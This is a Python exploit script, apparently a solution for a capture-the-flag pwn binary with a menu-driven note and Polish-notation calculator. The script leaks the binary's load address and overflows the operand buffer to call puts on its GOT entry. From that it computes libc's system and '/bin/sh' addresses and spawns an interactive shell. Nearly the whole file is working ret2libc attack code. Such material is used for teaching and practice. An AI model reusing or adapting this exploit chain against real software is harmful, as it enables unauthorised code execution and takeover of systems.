|
import struct

from minipwn import *
|
|
|
def read_note(s):
    """Select menu option 1 and return the line the target prints as the note.

    Args:
        s: connection handle returned by ``connect_process``; all traffic
           goes through the ``recvuntil``/``sendline``/``recvline`` helpers.

    Returns:
        Whatever ``recvline`` yields after the ``'Your note: '`` prompt
        (raw, not parsed).
    """
    # Wait for the menu prompt, pick "1", then skip ahead to the note label.
    recvuntil(s, '> ')
    sendline(s, '1')
    recvuntil(s, 'Your note: ')
    return recvline(s)
|
|
|
def polish_sum(s, operands):
    """Drive menu option 2 with operator 'S' and return the printed sum.

    Each operand is sent as ``str(operand)`` after an ``'Operand: '``
    prompt; the list is closed with a lone ``'.'``.

    Args:
        s: connection handle to the target process.
        operands: iterable of values to feed, in order.

    Returns:
        The integer parsed from the line following ``'Sum: '``.

    Raises:
        ValueError: if the target prints something ``int()`` cannot parse.
    """
    def answer(prompt, reply):
        # One request/response round-trip against the menu.
        recvuntil(s, prompt)
        sendline(s, reply)

    answer('> ', '2')
    answer('Operator: ', 'S')
    for term in operands:
        answer('Operand: ', str(term))
    # '.' terminates the operand list on the target side.
    answer('Operand: ', '.')
    recvuntil(s, 'Sum: ')
    return int(recvline(s))
|
|
|
def sign(s, value):
    """Select menu option 5 and send ``value`` as its argument.

    Note that no prompt is awaited between the option and the value; both
    lines are written back to back.

    Args:
        s: connection handle to the target process.
        value: converted with ``str()`` before being sent.
    """
    recvuntil(s, '> ')
    for line in ('5', str(value)):
        sendline(s, line)
|
|
|
# Stage 1: obtain the binary's load address from the note contents.
s = connect_process(['./rec_7743d76881fe811335ca25d8b0a3c5f54a21e2f1'])
#raw_input()

# Bytes 4..8 of the note are read as a 32-bit value; subtracting the fixed
# offset 0x6fb gives the base the rest of the script rebases against.
# This leak is the information disclosure the whole chain depends on.
note = read_note(s)
bin_base = u32(note[4:8]) - 0x6fb
print("[+] bin_base = %x" % bin_base)

# Build-specific offsets (named after puts' PLT and GOT entries).
plt_puts = bin_base + 0x520
got_puts = bin_base + 0x2fd8

# 0x63 small filler operands followed by the two addresses, then option 5
# with 0.  Why exactly 0x63 is needed is not visible here — TODO confirm
# against the target's operand buffer.
values = list(range(0x63)) + [plt_puts, got_puts]
polish_sum(s, values)
sign(s, 0)
|
|
|
""" |
|
$ nm -D /lib32/libc.so.6 | grep -e puts$ -e system$ |
|
0005f140 W puts |
|
0003a940 W system |
|
|
|
$ strings -tx /lib32/libc.so.6 | grep /bin/sh |
|
158e8b /bin/sh |
|
""" |
|
|
|
data = recvline(s) |
|
libc_puts = u32(data[:4]) |
|
print "[+] libc_puts = %x" % libc_puts |
|
libc_system = libc_puts - 0x0005f140 + 0x0003a940 |
|
libc_binsh = libc_puts - 0x0005f140 + 0x158e8b |
|
print "[+] libc_system = %x" % libc_system |
|
print "[+] libc_binsh = %x" % libc_binsh |
|
|
|
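def u2s(x):
    """Reinterpret a 32-bit unsigned integer as a signed (two's complement) one.

    Relies on the ``struct`` module, which must be imported explicitly
    rather than inherited through the ``minipwn`` wildcard import.

    Args:
        x: integer with ``0 <= x < 2**32``.

    Returns:
        The same little-endian 32-bit pattern read back as a signed int,
        e.g. ``0xffffffff`` -> ``-1``.

    Raises:
        struct.error: if ``x`` does not fit an unsigned 32-bit field.
    """
    # Local renamed from ``s`` so it no longer shadows the module-level
    # connection handle of the same name.
    packed = struct.pack('<I', x)
    return struct.unpack('<i', packed)[0]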
|
|
|
# Stage 3: repeat the option-2/option-5 sequence with the rebased libc
# values.  They are passed through u2s() first, presumably because the
# target parses operands as signed 32-bit integers — TODO confirm.
values = list(range(0x63)) + [u2s(libc_system), u2s(libc_binsh)]
polish_sum(s, values)
sign(s, 0)

print("[+] got a shell!")
interact(s)